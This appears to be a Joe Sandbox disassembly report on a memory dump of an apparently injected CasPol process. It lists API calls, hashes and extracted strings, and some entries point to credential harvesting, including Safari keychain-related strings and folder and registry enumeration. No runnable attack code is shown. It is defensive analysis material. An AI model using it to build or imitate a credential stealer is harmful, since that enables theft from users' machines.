                                                                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                APIs
                                                                                                • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileRead
                                                                                                • String ID:
                                                                                                • API String ID: 2738559852-0
                                                                                                • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                APIs
                                                                                                • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3934441357-0
                                                                                                • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                APIs
                                                                                                • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID:
                                                                                                • API String ID: 3664257935-0
                                                                                                • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID:
                                                                                                • API String ID: 823142352-0
                                                                                                • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID:
                                                                                                • API String ID: 823142352-0
                                                                                                • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                APIs
                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??3@
                                                                                                • String ID:
                                                                                                • API String ID: 613200358-0
                                                                                                • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                APIs
                                                                                                • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID:
                                                                                                • API String ID: 3664257935-0
                                                                                                • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                APIs
                                                                                                • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnumNamesResource
                                                                                                • String ID:
                                                                                                • API String ID: 3334572018-0
                                                                                                • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                APIs
                                                                                                • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID:
                                                                                                • API String ID: 3664257935-0
                                                                                                • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                APIs
                                                                                                • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseFind
                                                                                                • String ID:
                                                                                                • API String ID: 1863332320-0
                                                                                                • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: Open
                                                                                                • String ID:
                                                                                                • API String ID: 71445658-0
                                                                                                • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                APIs
                                                                                                • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 004095FC
                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                  • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                  • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                • String ID:
                                                                                                • API String ID: 3655998216-0
                                                                                                • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 00445426
                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                • String ID:
                                                                                                • API String ID: 1828521557-0
                                                                                                • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcsicmp
                                                                                                • String ID:
                                                                                                • API String ID: 2081463915-0
                                                                                                • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                APIs
                                                                                                  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                • String ID:
                                                                                                • API String ID: 2136311172-0
                                                                                                • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                APIs
                                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??2@??3@
                                                                                                • String ID:
                                                                                                • API String ID: 1936579350-0
                                                                                                • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: free
                                                                                                • String ID:
                                                                                                • API String ID: 1294909896-0
                                                                                                • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: free
                                                                                                • String ID:
                                                                                                • API String ID: 1294909896-0
                                                                                                • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: free
                                                                                                • String ID:
                                                                                                • API String ID: 1294909896-0
                                                                                                • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32 ref: 004182D7
                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                • free.MSVCRT ref: 00418370
                                                                                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                • String ID: OsError 0x%x (%u)
                                                                                                • API String ID: 2360000266-2664311388
                                                                                                • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                APIs
                                                                                                • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: Version
                                                                                                • String ID:
                                                                                                • API String ID: 1889659487-0
                                                                                                • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                APIs
                                                                                                • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                • _wcsicmp.MSVCRT ref: 00402305
                                                                                                • _wcsicmp.MSVCRT ref: 00402333
                                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                • memset.MSVCRT ref: 0040265F
                                                                                                • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                • API String ID: 577499730-1134094380
                                                                                                • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
